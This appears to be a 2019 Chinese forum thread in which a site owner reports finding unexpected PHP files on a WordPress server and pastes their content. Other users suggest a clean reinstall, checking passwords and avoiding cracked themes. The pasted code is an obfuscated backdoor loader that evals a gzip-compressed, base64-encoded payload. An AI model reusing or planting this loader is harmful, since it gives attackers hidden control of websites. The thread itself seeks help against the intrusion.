有大佬在吗？wordpress也被黑了

dengwen168 · 发表于 2019-6-7 15:23:28

本帖最后由 dengwen168 于 2019-6-7 15:29 编辑

一个破网站，几乎没有管它

今天给服务器搬家，里面竟然发现几个ugmtcz3b7o.php文件。。

不知是什么原因？

这个网站是放vps上的。

我能想到的只能是模板问题了。

请大家分析分析？

附：里面的代码是这样的：

eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));

风影OvO · 发表于 2019-6-7 15:25:28

蛋蛋 · 发表于 2019-6-7 15:27:29

这啥？？ sssss？？？？

dengwen168 · 发表于 2019-6-7 15:28:01

蛋蛋发表于 2019-6-7 15:27

这啥？？ sssss？？？？
贴不了代码。。。

blues · 发表于 2019-6-7 15:27:00

把附件挨个检查一遍重新下载wordpress源码重新安装网站和插件

mfcer · 发表于 2019-6-7 15:28:51

想知道用的什么主题

dengwen168 · 发表于 2019-6-7 15:29:36

mfcer 发表于 2019-6-7 15:29

想知道用的什么主题
用的一个很少人用的主题：

Kommunity

yumijie · 发表于 2019-6-7 15:36:45

如果用的破解版本的模板最好检查下文件,有条件扫描下漏铜啥的.
我用免费的模板都是在官网下载或者到wordpress.org去下载,应该安全得多.

其他的破解版本的模板我都会一个一个文件查看,加密的就不用他了,或者解密之后再用

虚心学习 · 发表于 2019-6-7 15:29:00

一删了之第一有没有使用弱密码。第二有没有及时更新wordpress。一般wordpress都是爆破上马了。wordpress真的很安全。几乎几年来都不会遇到一个可以上传马的漏洞

坏坏HaoLan · 发表于 2019-6-7 15:41:21

一般是破解的插件主题有后门

		自动登录	找回密码
密码			立即注册